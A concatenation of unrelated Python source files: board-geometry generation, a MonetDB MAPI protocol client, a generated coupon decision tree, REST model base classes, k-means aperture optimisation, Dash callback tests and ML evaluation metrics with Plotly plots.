self.slots.append(Slot(xx + x, yy + y, size))
r -= step
def data(self):
return {'x': self.x,
'y': self.y,
'slots': [s.data() for s in self.slots]
}
class Home:
def __init__(self, color, entry):
self.slots = []
self.color = color
self.entry = entry
def data(self):
return {'color': self.color,
'entry': int(self.entry),
'slots': [s.data() for s in self.slots]}
class Start(Home):
def __init__(self, x, y, angle, distance, width, size, count, direction, color, entry):
super().__init__(color, entry)
px = math.sin(angle) * distance
py = math.cos(angle) * distance
dx = math.sin(angle + direction) * width / count
dy = math.cos(angle + direction) * width / count
x0 = (x + px) - (dx * ((count - 1) / 2))
y0 = (y + py) - (dy * ((count - 1) / 2))
for i in range(0, count):
self.slots.append(Slot(x0, y0, size, color))
x0 += dx
y0 += dy
class Goal(Home):
def __init__(self, x, y, angle, distance, width, size, count, direction, color, entry):
super().__init__(color, entry)
px = math.sin(angle) * (distance + width)
py = math.cos(angle) * (distance + width)
dx = math.sin(angle + direction) * width / count
dy = math.cos(angle + direction) * width / count
x0 = (x + px)
y0 = (y + py)
for i in range(0, count):
self.slots.append(Slot(x0, y0, size))
x0 -= dx
y0 -= dy
def main():
encoder = json.JSONEncoder(indent=1)
ball_rad = 6
ring_count = 20
ring = Ring(250, 250, 150, ball_rad, ring_count)
starts = []
colors = ["red", "yellow", "blue", "green"]
entry = 0
for a in range(0, 4):
starts.append(Start(250, 250,
a * (-math.pi / 2),
200, 100, ball_rad, 4, math.pi / 2, colors[a], entry))
entry += ring_count / 4
goals = []
entry = ring_count
for a in reversed(range(0, 4)):
goals.append(Goal(250, 250,
a * (-math.pi / 2),
20, 100, ball_rad, 4, 0, colors[a], entry))
entry += ring_count / 4
data = encoder.encode({'width': 500,
'height': 500,
'ring': ring.data(),
'starts': [s.data() for s in starts],
'goals': [g.data() for g in goals]})
with open("gui/data.json", 'w') as f:
f.write(data)
if __name__ == "__main__":
main()
|
# The contents of this file are subject to the MonetDB Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.monetdb.org/Legal/MonetDBLicense
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is the MonetDB Database System.
#
# The Initial Developer of the Original Code is CWI.
# Portions created by CWI are Copyright (C) 1997-July 2008 CWI.
# Copyright August 2008-2015 MonetDB B.V.
# All Rights Reserved.
"""
This is the python2 implementation of the mapi protocol.
"""
import socket
import logging
import struct
import hashlib
import os
from io import BytesIO
from select import select
from greenlet import greenlet
from monetdb.exceptions import (OperationalError, DatabaseError, ProgrammingError,
NotSupportedError, InterfaceError)
logger = logging.getLogger("monetdb")
logger.addHandler(logging.NullHandler())
MAX_PACKAGE_LENGTH = (1024 * 8) - 2
MSG_PROMPT = ""
MSG_MORE = "\1\2\n"
MSG_INFO = "#"
MSG_ERROR = "!"
MSG_Q = "&"
MSG_QTABLE = "&1"
MSG_QUPDATE = "&2"
MSG_QSCHEMA = "&3"
MSG_QTRANS = "&4"
MSG_QPREPARE = "&5"
MSG_QBLOCK = "&6"
MSG_HEADER = "%"
MSG_TUPLE = "["
MSG_TUPLE_NOSLICE = "="
MSG_REDIRECT = "^"
MSG_OK = "=OK"
STATE_INIT = 0
STATE_READY = 1
POLL_READ = 0
POLL_WRITE = 1
POLL_OK = 2
# noinspection PyExceptionInherit
class Connection(object):
"""
MAPI (low level MonetDB API) connection
"""
def __init__(self):
self.state = STATE_INIT
self._result = None
self.socket = ""
self.hostname = ""
self.port = 0
self.username = ""
self.password = ""
self.database = ""
self.language = ""
self.connectionclosed = False
def connect(self, database, username, password, language, hostname=None,
port=None, unix_socket=None, var_async=False):
""" setup connection to MAPI server
unix_socket is used if hostname is not defined.
"""
if hostname and hostname[:1] == '/' and not unix_socket:
unix_socket = '%s/.s.monetdb.%d' % (hostname, port)
hostname = None
if not unix_socket and os.path.exists("/tmp/.s.monetdb.%i" % port):
unix_socket = "/tmp/.s.monetdb.%i" % port
elif not hostname:
hostname = 'localhost'
self.hostname = hostname
self.port = port
self.username = username
self.password = password
self.database = database
self.language = language
self.unix_socket = unix_socket
self.var_async = var_async
self.__isexecuting = False
if hostname:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# For performance, mirror MonetDB/src/common/stream.c socket settings.
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.connect((hostname, port))
else:
self.socket = socket.socket(socket.AF_UNIX)
self.socket.connect(unix_socket)
if self.language != 'control':
self.socket.send('0'.encode()) # don't know why, but we need to do this
if not (self.language == 'control' and not self.hostname):
# control doesn't require authentication over socket
self._login()
self.state = STATE_READY
def _login(self, iteration=0):
""" Reads challenge from line, generate response and check if
everything is okay """
challenge = self._getblock()
response = self._challenge_response(challenge)
self._putblock(response)
prompt = self._getblock().strip()
if len(prompt) == 0:
# Empty response, server is happy
pass
elif prompt == MSG_OK:
pass
elif prompt.startswith(MSG_INFO):
logger.info("%s" % prompt[1:])
elif prompt.startswith(MSG_ERROR):
logger.error(prompt[1:])
raise DatabaseError(prompt[1:])
elif prompt.startswith(MSG_REDIRECT):
# a redirect can contain multiple redirects, for now we only use
# the first
redirect = prompt.split()[0][1:].split(':')
if redirect[1] == "merovingian":
logger.debug("restarting authentication")
if iteration <= 10:
self._login(iteration=iteration + 1)
else:
raise OperationalError("maximal number of redirects "
"reached (10)")
elif redirect[1] == "monetdb":
self.hostname = redirect[2][2:]
self.port, self.database = redirect[3].split('/')
self.port = int(self.port)
logger.info("redirect to monetdb://%s:%s/%s" %
(self.hostname, self.port, self.database))
self.socket.close()
self.connect(self.hostname, self.port, self.username,
self.password, self.database, self.language)
else:
raise ProgrammingError("unknown redirect: %s" % prompt)
else:
raise ProgrammingError("unknown state: %s" % prompt)
def disconnect(self):
""" disconnect from the monetdb server """
self.state = STATE_INIT
self.socket.close()
def cmd(self, operation, f=None):
""" put a mapi command on the line"""
logger.debug("executing command %s" % operation)
if self.state != STATE_READY:
raise ProgrammingError
while True:
self._putblock(operation)
response = self._getblock()
if not len(response):
return ""
elif response.startswith(MSG_OK):
return response[3:].strip() or ""
elif response == MSG_MORE:
if f is not None:
operation = f.read(4096)
if operation != "":
continue
return self.cmd("")
elif response[0] in [MSG_Q, MSG_HEADER, MSG_TUPLE]:
return response
elif response[0] == MSG_ERROR:
raise OperationalError(response[1:])
elif (self.language == 'control' and not self.hostname):
if response.startswith("OK"):
return response[2:].strip() or ""
else:
return response
else:
raise ProgrammingError("unknown state: %s" % response)
def poll(self):
if not self.var_async:
raise InterfaceError("Poll called on a synchronous connection")
if not self.isexecuting():
raise InterfaceError("No command is currently executing")
state = self._greenlet.switch()
if self._greenlet.dead: # task has completed
self.__isexecuting = False
return POLL_OK
return state
def runasync(self, function):
self.__isexecuting = True
self._greenlet = greenlet(function)
def isexecuting(self):
return self.__isexecuting
def fileno(self):
return self.socket.fileno()
def _challenge_response(self, challenge):
""" generate a response to a mapi login challenge """
challenges = challenge.split(':')
salt, identity, protocol, hashes, endian = challenges[:5]
password = <PASSWORD>
if protocol == '9':
algo = challenges[5]
try:
h = hashlib.new(algo)
h.update(password.encode())
password = h.hexdigest()
except ValueError as e:
raise NotSupportedError(e.message)
else:
raise NotSupportedError("We only speak protocol v9")
h = hashes.split(",")
if "SHA1" in h:
s = hashlib.sha1()
s.update(password.encode())
s.update(salt.encode())
pwhash = "{SHA1}" + s.hexdigest()
elif "MD5" in h:
m = hashlib.md5()
m.update(password.encode())
m.update(salt.encode())
pwhash = "{MD5}" + m.hexdigest()
else:
raise NotSupportedError("Unsupported hash algorithms required"
" for login: %s" % hashes)
return ":".join(["BIG", self.username, pwhash, self.language,
self.database]) + ":"
def _getblock(self):
""" read one mapi encoded block """
if (self.language == 'control' and not self.hostname):
return self._getblock_socket() # control doesn't do block
# splitting when using a socket
else:
return self._getblock_inet()
def _getblock_inet(self):
result = BytesIO()
last = 0
while not last:
flag = self._getbytes(2)
unpacked = struct.unpack('<H', flag)[0] # little endian short
length = unpacked >> 1
last = unpacked & 1
result.write(self._getbytes(length))
result_str = result.getvalue()
return result_str.decode()
def _getblock_socket(self):
buffer = BytesIO()
while True:
x = self.socket.recv(1)
if len(x):
buffer.write(x)
else:
break
return buffer.getvalue().strip()
def _getbytes(self, bytes_):
"""Read an amount of bytes from the socket"""
result = BytesIO()
count = bytes_
while count > 0:
if self.var_async:
parent = greenlet.getcurrent().parent
# Switch to parent greenlet if var_async and no data ready to read
while parent and not select([self.socket.fileno()], [], [], 0)[0]:
parent.switch(POLL_READ)
recv = self.socket.recv(count)
if len(recv) == 0:
self.connectionclosed = True
raise OperationalError("Server closed connection")
count -= len(recv)
result.write(recv)
return result.getvalue()
def _putblock(self, block):
""" wrap the line in mapi format and put it into the socket """
if (self.language == 'control' and not self.hostname):
return self.socket.send(block.encode()) # control doesn't do block
# splitting when using a socket
else:
self._putblock_inet(block)
def _putblock_inet(self, block):
pos = 0
last = 0
while not last:
data = block[pos:pos + MAX_PACKAGE_LENGTH].encode()
length = len(data)
if length < MAX_PACKAGE_LENGTH:
last = 1
flag = struct.pack('<H', (length << 1) + last)
if self.var_async:
# Switch to parent greenlet if var_async and socket not ready to accept data
parent =greenlet.getcurrent().parent
while parent and not select([], [self.socket.fileno()], [], 0)[1]:
parent.switch(POLL_WRITE)
self.socket.send(flag)
self.socket.send(data)
pos += length
def __del__(self):
if self.socket:
self.socket.close()
def __repr__(self):
return "<%s.%s object at 0x%x; url: 'monetdb://%s:%s/%s'>" % (
self.__class__.__module__, self.__class__.__name__, id(self), self.hostname, self.port,
self.database)
#backwards compatiblity
Server = Connection
|
def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Maritalstatus, obj[8]: Children, obj[9]: Education, obj[10]: Occupation, obj[11]: Income, obj[12]: Bar, obj[13]: Coffeehouse, obj[14]: Restaurantlessthan20, obj[15]: Restaurant20to50, obj[16]: Direction_same, obj[17]: Distance
# {"feature": "Distance", "instances": 51, "metric_value": 0.9774, "depth": 1}
if obj[17]<=2:
# {"feature": "Occupation", "instances": 45, "metric_value": 0.9183, "depth": 2}
if obj[10]<=17:
# {"feature": "Coupon", "instances": 42, "metric_value": 0.8631, "depth": 3}
if obj[3]<=3:
# {"feature": "Age", "instances": 26, "metric_value": 0.6194, "depth": 4}
if obj[6]<=3:
# {"feature": "Bar", "instances": 17, "metric_value": 0.7871, "depth": 5}
if obj[12]>0.0:
# {"feature": "Coffeehouse", "instances": 12, "metric_value": 0.9183, "depth": 6}
if obj[13]<=2.0:
# {"feature": "Education", "instances": 8, "metric_value": 1.0, "depth": 7}
if obj[9]<=2:
# {"feature": "Time", "instances": 6, "metric_value": 0.9183, "depth": 8}
if obj[2]>1:
# {"feature": "Weather", "instances": 4, "metric_value": 1.0, "depth": 9}
if obj[1]<=0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.9183, "depth": 10}
if obj[0]>1:
# {"feature": "Coupon_validity", "instances": 2, "metric_value": 1.0, "depth": 11}
if obj[4]<=1:
# {"feature": "Gender", "instances": 2, "metric_value": 1.0, "depth": 12}
if obj[5]<=1:
# {"feature": "Maritalstatus", "instances": 2, "metric_value": 1.0, "depth": 13}
if obj[7]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 1.0, "depth": 14}
if obj[8]<=0:
# {"feature": "Income", "instances": 2, "metric_value": 1.0, "depth": 15}
if obj[11]<=0:
# {"feature": "Restaurantlessthan20", "instances": 2, "metric_value": 1.0, "depth": 16}
if obj[14]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 1.0, "depth": 17}
if obj[15]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 1.0, "depth": 18}
if obj[16]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=1:
return 'False'
else: return 'False'
elif obj[1]>0:
return 'True'
else: return 'True'
elif obj[2]<=1:
return 'True'
else: return 'True'
elif obj[9]>2:
return 'False'
else: return 'False'
elif obj[13]>2.0:
return 'True'
else: return 'True'
elif obj[12]<=0.0:
return 'True'
else: return 'True'
elif obj[6]>3:
return 'True'
else: return 'True'
elif obj[3]>3:
# {"feature": "Bar", "instances": 16, "metric_value": 1.0, "depth": 4}
if obj[12]<=1.0:
# {"feature": "Coffeehouse", "instances": 14, "metric_value": 0.9852, "depth": 5}
if obj[13]<=2.0:
# {"feature": "Income", "instances": 10, "metric_value": 0.971, "depth": 6}
if obj[11]>1:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.8113, "depth": 7}
if obj[0]<=1:
return 'False'
elif obj[0]>1:
# {"feature": "Time", "instances": 4, "metric_value": 1.0, "depth": 8}
if obj[2]<=0:
# {"feature": "Age", "instances": 3, "metric_value": 0.9183, "depth": 9}
if obj[6]>1:
return 'True'
elif obj[6]<=1:
return 'False'
else: return 'False'
elif obj[2]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[11]<=1:
return 'True'
else: return 'True'
elif obj[13]>2.0:
return 'True'
else: return 'True'
elif obj[12]>1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>17:
return 'False'
else: return 'False'
elif obj[17]>2:
return 'False'
else: return 'False'
|
import abc
import logging
from typing import Callable, Optional, Type, TypeVar
import requests
from pydantic import Field
from pydantic.main import BaseModel
from nonbonded.library.config import settings
T = TypeVar("T", bound="BaseREST")
class CollectionMeta(BaseModel):
"""A data model which stores metadata about a retrieved collection, such as
pagination information."""
skip: int = Field(..., description="The number of skipped records.")
limit: int = Field(..., description="The maximum number of records returned.")
total_records: int = Field(
..., description="The total number of records in the collection"
)
class BaseORM(BaseModel, abc.ABC):
class Config:
orm_mode = True
def to_file(self, file_path: str):
"""JSON serializes this object and saves the output to the specified
file path.
Parameters
----------
file_path: str
The path to save the JSON serialized object to.
"""
with open(file_path, "w") as file:
file.write(self.json())
class BaseREST(BaseORM, abc.ABC):
@classmethod
@abc.abstractmethod
def _get_endpoint(cls, **kwargs):
raise NotImplementedError()
@abc.abstractmethod
def _post_endpoint(self):
raise NotImplementedError()
@abc.abstractmethod
def _put_endpoint(self):
raise NotImplementedError()
@abc.abstractmethod
def _delete_endpoint(self):
raise NotImplementedError()
def _upload(self, request_function: Callable, url: str) -> T:
"""The internal implementation of the upload and update methods."""
request = request_function(
url=url,
data=self.json(),
headers={"access_token": settings.ACCESS_TOKEN},
)
try:
request.raise_for_status()
except requests.exceptions.HTTPError as error:
logging.exception(error.response.text)
raise
except Exception: # pragma: no cover
raise
return_object = self.__class__.parse_raw(request.text)
return return_object
def upload(self, requests_class=requests) -> T:
"""Attempt to upload this object to the RESTful API for the first time.
This function should only be used for the initial upload. To update an
existing instance, used the ``update`` function instead.
Objects which have been uploaded to the RESTful API can be easily retrieved
using ``from_rest`` class function.
An exception will be raised if the API already contains an instance of this
object with the same identifiers.
Notes
-----
The RESTful API returns back the object which was posted - this may not be
identical to the initially submitted object as the API may have assigned /
changed some of the ids. The returned object should **always** be used in
place of the initial one.
"""
return self._upload(requests_class.post, self._post_endpoint())
def update(self, requests_class=requests) -> T:
"""Attempt to update this object on the RESTful API. This function assumes
that this object has already been uploaded using the ``upload`` function.
An exception will be raised if this object has not already been uploaded.
"""
return self._upload(requests_class.put, self._put_endpoint())
def delete(self, requests_class=requests):
"""Attempt to delete this object on the RESTful API. This function assumes
that this object has already been uploaded using the ``upload`` function.
An exception will be raised if this object has not already been uploaded.
"""
request = requests_class.delete(
url=self._delete_endpoint(), headers={"access_token": settings.ACCESS_TOKEN}
)
try:
request.raise_for_status()
except requests.exceptions.HTTPError as error:
logging.exception(error.response.text)
raise
except Exception: # pragma: no cover
raise
@classmethod
def from_rest(cls: Type[T], **kwargs) -> T:
"""Attempts to retrieve an instance of this object from the RESTful API
based on its unique identifier(s)
"""
requests_class = kwargs.pop("requests_class", requests)
request = requests_class.get(cls._get_endpoint(**kwargs))
try:
request.raise_for_status()
except requests.exceptions.HTTPError as error:
logging.exception(error.response.text)
raise
except Exception: # pragma: no cover
raise
return cls.parse_raw(request.text)
class BaseRESTCollection(BaseORM, abc.ABC):
metadata: Optional[CollectionMeta] = Field(
None,
description="Metadata associated with a collection retrieved from a RESTful "
"API such as pagination information.",
)
@classmethod
@abc.abstractmethod
def _get_endpoint(cls, **kwargs):
raise NotImplementedError()
@classmethod
def from_rest(cls: Type[T], **kwargs) -> T:
"""Attempts to retrieve an instance of this object from the RESTful API
based on its unique identifier(s)
"""
requests_class = kwargs.pop("requests_class", requests)
request = requests_class.get(cls._get_endpoint(**kwargs))
try:
request.raise_for_status()
except requests.exceptions.HTTPError as error:
logging.exception(error.response.text)
raise
except Exception: # pragma: no cover
raise
return cls.parse_raw(request.text)
|
<reponame>alex-parker/kmao
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
k-means aperture optimization utilities.
see example1.py file for use cases.
'''
import numpy as np
from scipy.signal import convolve2d
from scipy.optimize import fmin, minimize
from scipy.ndimage import shift
from scipy.stats import trimboth
from sklearn.cluster import KMeans
__version__ = "0.4"
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def cross_dilate(init_mask, N):
final_mask = init_mask.copy()
for i in range(0, N):
final_mask = convolve2d(final_mask,
[[0, 1, 0], [1, 1, 1], [0, 1, 0]], mode='same')
return final_mask > 0
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def lfstdv(y_in, x_in=None):
y = y_in.copy()
if x_in != None:
y = y[np.argsort(x_in)]
delta = np.sort((y[1:-1]-y[2:])-0.5*(y[:-2]-y[2:]))
### scaled to match standard deviation of
### gaussian noise on constant signal
### also, trim outliers.
return 0.8166137*np.std( trimboth( delta, 0.05 ) )
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def scatterscale(params, data, aperture_id, ret=False):
Z = np.unique(aperture_id)
s = []
for z in Z:
s.append(np.sum(aperture_id==z))
id_leavout = Z[np.argmax(s)]
scaled_data = np.zeros(data.shape)
count = 0
for z in Z:
if z == id_leavout:
scaled_data[aperture_id==z] = data[aperture_id==z]
continue
scaled_data[aperture_id==z] = data[aperture_id==z] * params[count]
count += 1
if ret:
return scaled_data
return lfstdv(scaled_data)
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def scatternorm(data, aperture_id):
param0 = np.ones(np.unique(aperture_id).size - 1)
result = minimize(scatterscale, param0, args=(data, aperture_id),
method='powell', options={'disp':True})
return scatterscale(result.x, data, aperture_id, ret=True)
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def cluster(data, mask0, N=5):
features = []
for i in range(0, data.shape[0]):
v = data[i].copy()
v /= np.nanmean(v[mask0])
features.append(v[mask0].ravel())
features = np.array(features)
features[np.isnan(features)] = 0.0
model = KMeans(init='k-means++', n_clusters=N, n_init=min(5*N, data.shape[0]), algorithm='full')
model.fit(features)
aperture_id = model.predict(features)
for z in np.unique(aperture_id):
print('Aperture %d -- %d images'%(z+1, np.sum(aperture_id==z)))
return aperture_id
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
def reduce_apertures(data, mask0, aperture_id, correct=True, thresh=0.99, grow=1):
time_series = np.zeros(aperture_id.shape)
for z in np.unique(aperture_id):
inds = np.where(aperture_id==z)
delta = data[inds].copy()
delta_ratio = data[inds].copy() ### left redundant in case a sky ratio is needed
max_delta = np.nanmean(delta, axis=0)
max_delta_ratio = np.nanmean(delta_ratio, axis=0)
max_delta[max_delta<=0] = 0
max_delta[np.isnan(max_delta)] = 0
temp_mask = mask0.copy()
max_delta[~temp_mask] = 0
max_delta_ratio[~temp_mask] = np.inf
tot = np.nansum(max_delta[temp_mask])
while np.nansum(max_delta[temp_mask]) / tot > thresh:
ij = np.unravel_index(max_delta_ratio.argmin(), max_delta_ratio.shape)
temp_mask[ij] = False
max_delta_ratio[ij] = np.inf
temp_mask = cross_dilate(temp_mask, grow)
for i in inds[0]:
time_series[i] = np.nansum(data[i][temp_mask])
if correct:
time_series = scatternorm(time_series, aperture_id)
return time_series
### ---------------------------------------------------------------------------
### ---------------------------------------------------------------------------
|
"""
Testing of callbacks in non-Python input snippets.
"""
from pathlib import Path
import dash.testing.wait as wait
from .helpers import load_jl_app, load_r_app
HERE = Path(__file__).parent
def test_r_input_simple(dashr):
r_app = load_r_app((HERE.parent / "input" / "simple.R"), "text_input")
dashr.start_server(r_app)
check_input_simple_callbacks(dashr)
def test_jl_input_simple(dashjl):
jl_app = load_jl_app((HERE.parent / "input" / "simple.jl"), "text_input")
dashjl.start_server(jl_app)
check_input_simple_callbacks(dashjl)
def check_input_simple_callbacks(runner):
runner.find_element("#input").send_keys("x")
wait.until(
lambda: runner.find_element("#output").text == "x",
timeout=4,
)
# --------------------------------
def test_r_input_radio_ckeck(dashr):
r_app = load_r_app((HERE.parent / "input" / "radio_check.R"), "inputs")
dashr.start_server(r_app)
check_input_radio_check_callbacks(dashr)
def test_jl_input_radio_check(dashjl):
jl_app = load_jl_app((HERE.parent / "input" / "radio_check.jl"), "inputs")
dashjl.start_server(jl_app)
check_input_radio_check_callbacks(dashjl)
def check_input_radio_check_callbacks(runner):
wait.until(
lambda: runner.find_element("#radioitems-checklist-output").text
== "Radio button 1, 1 checklist item and 1 switch selected.",
timeout=10,
)
runner.find_element(
"label[for='_dbcprivate_radioitems_radioitems-input_input_2']"
).click()
runner.find_element(
"label[for='_dbcprivate_checklist_checklist-input_input_2']"
).click()
runner.find_element(
"label[for='_dbcprivate_checklist_switches-input_input_2']"
).click()
wait.until(
lambda: runner.find_element("#radioitems-checklist-output").text
== "Radio button 2, 2 checklist items and 2 switches selected.",
timeout=10,
)
# --------------------------------
def test_r_input_radio_check_standalone(dashr):
r_app = load_r_app(
(HERE.parent / "input" / "radio_check_standalone.R"),
"standalone_radio_check",
)
dashr.start_server(r_app)
check_input_radio_check_standalone_callbacks(dashr)
def test_jl_input_radio_check_standalone(dashjl):
jl_app = load_jl_app(
(HERE.parent / "input" / "radio_check_standalone.jl"),
"standalone_radio_check",
)
dashjl.start_server(jl_app)
check_input_radio_check_standalone_callbacks(dashjl)
def check_input_radio_check_standalone_callbacks(runner):
outcome = (
"Selections: Checkbox: {0}, Toggle Switch: {0}, Radio Button: {0}"
)
wait.until(
lambda: runner.find_element("#standalone-radio-check-output").text
== outcome.format(False),
timeout=10,
)
runner.find_element("#standalone-checkbox").click()
runner.find_element("#standalone-switch").click()
runner.find_element("#standalone-radio").click()
wait.until(
lambda: runner.find_element("#standalone-radio-check-output").text
== outcome.format(True),
timeout=10,
)
runner.find_element("#standalone-checkbox").click()
runner.find_element("#standalone-switch").click()
runner.find_element("#standalone-radio").click()
wait.until(
lambda: runner.find_element("#standalone-radio-check-output").text
== outcome.format(False),
timeout=10,
)
|
import dill
import numpy as np
import pandas as pd
import plotly.graph_objects as go
from sklearn import metrics
def show_results(
predictions,
model_name,
show_plot=True,
save_plot=True,
save_folder="data/processed",
):
binary_classification_results = (
get_binary_classification_results(
predictions, model_name, save_folder
)
)
regression_results = get_regression_results(
predictions, model_name, save_folder
)
plot_roc_auc_curve(
predictions, model_name, show_plot, save_plot, save_folder
)
plot_precision_recall_curve(
predictions,
binary_classification_results,
model_name,
show_plot,
save_plot,
save_folder,
)
plot_predictions(
predictions, model_name, show_plot, save_plot, save_folder
)
def get_binary_classification_results(dataset, model_name="model", save_folder="data"):
binary_classification_results = dict()
total_population = len(
dataset[(dataset["y_true"].isin([0, 1])) & (dataset["y_pred"].isin([0, 1]))]
)
binary_classification_results["total_population"] = total_population
total_positive = len(
dataset[dataset["y_true"] == 1]
)
binary_classification_results["total_positive"] = total_positive
total_negative = len(
dataset[dataset["y_true"] == 0]
)
binary_classification_results["total_negative"] = total_negative
random_precision = total_positive / total_population
binary_classification_results["random_precision"] = random_precision
true_positive = len(dataset[(dataset["y_true"] == 1) & (dataset["y_pred"] == 1)])
binary_classification_results["true_positive"] = true_positive
false_negative = len(dataset[(dataset["y_true"] == 1) & (dataset["y_pred"] == 0)])
binary_classification_results["false_negative"] = false_negative
false_positive = len(dataset[(dataset["y_true"] == 0) & (dataset["y_pred"] == 1)])
binary_classification_results["false_positive"] = false_positive
true_negative = len(dataset[(dataset["y_true"] == 0) & (dataset["y_pred"] == 0)])
binary_classification_results["true_negative"] = true_negative
if (true_positive + false_negative) > 0:
recall = true_positive / (true_positive + false_negative)
miss_rate = false_negative / (true_positive + false_negative)
else:
recall = None
miss_rate = None
binary_classification_results["recall"] = recall
binary_classification_results["miss_rate"] = miss_rate
if (false_positive + true_negative) > 0:
fall_out = false_positive / (false_positive + true_negative)
specificity = true_negative / (false_positive + true_negative)
else:
fall_out = None
specificity = None
binary_classification_results["fall_out"] = fall_out
binary_classification_results["specificity"] = specificity
if (true_positive + false_positive) > 0:
precision = true_positive / (true_positive + false_positive)
false_discovery_rate = false_positive / (true_positive + false_positive)
else:
precision = None
false_discovery_rate = None
binary_classification_results["precision"] = precision
binary_classification_results["false_discovery_rate"] = false_discovery_rate
if (false_negative + true_negative) > 0:
false_omission_rate = false_negative / (false_negative + true_negative)
negative_predictive_value = true_negative / (false_negative + true_negative)
else:
false_omission_rate = None
negative_predictive_value = None
binary_classification_results["false_omission_rate"] = false_omission_rate
binary_classification_results["negative_predictive_value"] = negative_predictive_value
accuracy = (true_positive + true_negative) / total_population
binary_classification_results["accuracy"] = accuracy
prevalence = (true_positive + false_negative) / total_population
binary_classification_results["prevalence"] = prevalence
if fall_out:
positive_likelihood_ratio = recall / fall_out
else:
positive_likelihood_ratio = None
binary_classification_results["positive_likelihood_ratio"] = positive_likelihood_ratio
if specificity:
negative_likelihood_ratio = miss_rate / specificity
else:
negative_likelihood_ratio = None
binary_classification_results["negative_likelihood_ratio"] = negative_likelihood_ratio
if negative_likelihood_ratio:
diagnostic_odds_ratio = positive_likelihood_ratio / negative_likelihood_ratio
else:
diagnostic_odds_ratio = None
binary_classification_results["diagnostic_odds_ratio"] = diagnostic_odds_ratio
if (precision is not None) & (recall is not None):
if (precision + recall) > 0:
f1_score = 2 * precision * recall / (precision + recall)
else:
f1_score = None
else:
f1_score = None
binary_classification_results["f1_score"] = f1_score
logit_roc_auc = metrics.roc_auc_score(dataset["y_true"], dataset["y_pred"])
binary_classification_results["logit_roc_auc"] = logit_roc_auc
# Transform to table (to be saved)
binary_classification_results_table = pd.DataFrame.from_dict(
binary_classification_results, orient="index", columns=["value"]
)
binary_classification_results_table.to_csv(
f"{save_folder}/{model_name}_binary_classification_results_table.csv"
)
with open(
f"{save_folder}/{model_name}_binary_classification_results_dict.pkl", "wb"
) as file:
dill.dump(binary_classification_results, file)
return binary_classification_results
def get_regression_results(dataset, model_name="model", save_folder="data"):
regression_results = dict()
explained_variance_score = metrics.explained_variance_score(
y_true=dataset["y_true"], y_pred=dataset["y_proba"]
)
regression_results["explained_variance_score"] = explained_variance_score
max_error = metrics.max_error(y_true=dataset["y_true"], y_pred=dataset["y_proba"])
regression_results["max_error"] = max_error
mean_absolute_error = metrics.mean_absolute_error(
y_true=dataset["y_true"], y_pred=dataset["y_proba"]
)
regression_results["mean_absolute_error"] = mean_absolute_error
root_mean_squared_error = metrics.mean_squared_error(
y_true=dataset["y_true"], y_pred=dataset["y_proba"], squared=False
)
regression_results["root_mean_squared_error"] = root_mean_squared_error
r2_score = metrics.r2_score(y_true=dataset["y_true"], y_pred=dataset["y_proba"])
regression_results["r2_score"] = r2_score
normalised_log_loss = metrics.log_loss(dataset["y_true"], dataset["y_proba"])
regression_results["normalised_log_loss"] = normalised_log_loss
p = sum(dataset["y_true"]) / len(dataset)
average_log_loss = - (p * np.log(p) + (1-p) * np.log(1-p))
normalised_cross_entropy = normalised_log_loss / average_log_loss
regression_results["normalised_cross_entropy"] = normalised_cross_entropy
brier_score = metrics.brier_score_loss(dataset["y_true"], dataset["y_proba"])
regression_results["brier_score"] = brier_score
# Transform to table (to be saved)
regression_results_table = pd.DataFrame.from_dict(
regression_results, orient="index", columns=["value"]
)
regression_results_table.to_csv(
f"{save_folder}/{model_name}_regression_results_table.csv"
)
with open(
f"{save_folder}/{model_name}_regression_results_dict.pkl", "wb"
) as file:
dill.dump(regression_results, file)
return regression_results
def add_precision_recall_curve(fig, dataset, model_name="model"):
precision, recall, thresholds = metrics.precision_recall_curve(
dataset["y_true"], dataset["y_proba"]
)
fig.add_trace(go.Scatter(x=recall, y=precision, mode="lines", name=model_name))
return fig
def plot_precision_recall_curve(dataset, binary_classification_results, model_name="model",
show_plot=True, save_plot=True, save_folder="data"):
# Create traces
fig = go.Figure()
fig = add_precision_recall_curve(fig, dataset, model_name="model")
fig.add_trace(
go.Scatter(
x=[0, 1],
y=[
binary_classification_results["random_precision"],
binary_classification_results["random_precision"],
],
mode="lines",
name="Random precision",
line=dict(color="black", dash="dash"),
)
)
fig = add_square(fig, x0=0, x1=1, y0=0, y1=1)
fig.update_layout(
title="Precision-Recall curve",
legend={"itemsizing": "constant"},
)
fig.update_xaxes(title_text="Recall", range=[-0.05, 1.05])
fig.update_yaxes(title_text="Precision", range=[-0.05, 1.05])
if show_plot:
fig.show()
if save_plot:
fig.write_html(f"{save_folder}/{model_name}_PrecisionRecall.html")
def add_roc_auc_curve(fig, dataset, model_name="model"):
fpr, tpr, thresholds = metrics.roc_curve(dataset["y_true"], dataset["y_proba"])
fig.add_trace(go.Scatter(x=fpr, y=tpr, mode="lines", name=model_name))
return fig
